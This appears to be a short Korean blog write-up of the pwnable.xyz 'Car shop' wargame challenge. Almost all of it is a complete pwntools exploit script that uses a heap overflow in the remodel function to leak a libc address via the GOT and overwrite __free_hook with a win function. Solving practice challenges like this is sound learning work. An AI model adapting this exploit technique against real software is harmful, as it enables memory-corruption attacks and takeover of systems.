
pwnable.xyz / Car shop

lok2h4rd 2022. 5. 26. 15:05

mitigation

 

remodel 함수에서 길이를 갱신하는 과정에서 heap overflow를 낼 수 있다

릭하고 free_hook에다가 win 넣었다

 

from pwn import * 
context.log_level = "debug"  # pwntools: log every byte sent to / received from the tube


p = remote("svc.pwnable.xyz", 30037)  # challenge service; the commented line below is the local alternative
#p = process("./car_shop", env = {"LD_PRELOAD" : "./alpine-libc-2.23.so"})
libc = ELF("alpine-libc-2.23.so")  # libc shipped with the challenge; only its symbol offsets are used below


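def buy(idx):
    """Select menu option 1 (buy) and answer the index prompt with *idx*.

    *idx* is encoded explicitly so that every write to the tube is bytes,
    consistent with the other helpers; pwntools accepts a plain str only
    with a deprecation warning. Uses the module-level tube ``p``.
    """
    p.sendlineafter(b"> ", b"1")
    p.sendlineafter(b"> ", str(idx).encode())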

def sell(car):
    """Select menu option 2 (sell) and answer the ``sell: `` prompt with *car* (bytes).

    Uses the module-level tube ``p``.
    """
    p.sendlineafter(b"> ", b"2")
    p.sendlineafter(b"sell: ", car)

def remodel(car, data):
    """Select menu option 3 (remodel): name the car, then send the new model bytes.

    *car* and *data* are sent as-is (bytes). Uses the module-level tube ``p``.
    """
    exchange = (
        (b"> ", b"3"),
        (b"remodel: ", car),
        (b"model: ", data),
    )
    for prompt, answer in exchange:
        p.sendlineafter(prompt, answer)

def list():
    """Select menu option 4 (list cars) on the module-level tube ``p``.

    NOTE: this name shadows the builtin ``list``; it is kept because the
    script below calls it by this name.
    """
    p.sendlineafter(b"> ", b"4")


# Exploit sequence (see the writeup note above): a heap overflow from remodel's
# length update is used first to leak a libc address and then to overwrite
# __free_hook. Both addresses below are specific to this challenge binary.
# NOTE(review): __free_hook exists in the libc 2.23 loaded above; glibc 2.34+
# removed the allocator hooks, so this final step is version-dependent.
read_got = 0x601fb0  # address of read's GOT entry in car_shop
win = 0x400b4e       # address of the target function in car_shop
buy(0)
buy(2)

# Write 0x40 bytes into the car named "BMW" — this is the overflow described in the note.
payload = b"A" * 0x40
remodel(b"BMW", payload)

# 0x20 bytes of filler followed by read@GOT; presumably this replaces a pointer
# that list() later prints — confirm against the binary.
payload = b"A" * 0x20
payload += p64(read_got)
remodel(b"AA", payload)

list()
p.recvuntil(b": ")

car_name = p.recvuntil(b": ")
car_name = car_name[:-7]  # drop the trailing 7 bytes (presumably label text) to keep only the name

# The printed pointer is 6 bytes; pad to 8 so u64 can unpack it.
leak = p.recv(6)
leak += b"\x00\x00"

# The leaked value is read()'s address inside libc.
libc_base = u64(leak) - libc.symbols['read']
free_hook = libc.symbols['__free_hook']  + libc_base

log.info("libc_base: " + hex(libc_base))
log.info("free_hook: " + hex(free_hook))


# Reshape the heap objects before the second pointer overwrite; the reason for
# these exact sizes (2 and 0xff) is not stated in the writeup.
payload = b"A" * 2
remodel(car_name, payload)

payload = b"A" * 0xff
remodel(b"AA", payload)

# Same 0x20-offset pointer overwrite as above, now pointing at __free_hook.
payload = b"A" * 0x20
payload += p64(free_hook)
remodel(b"A", payload)

# Write win's address through the redirected pointer into __free_hook (the
# "free_hook에다가 win" step from the note).
remodel(b"\x00", p64(win))

p.interactive()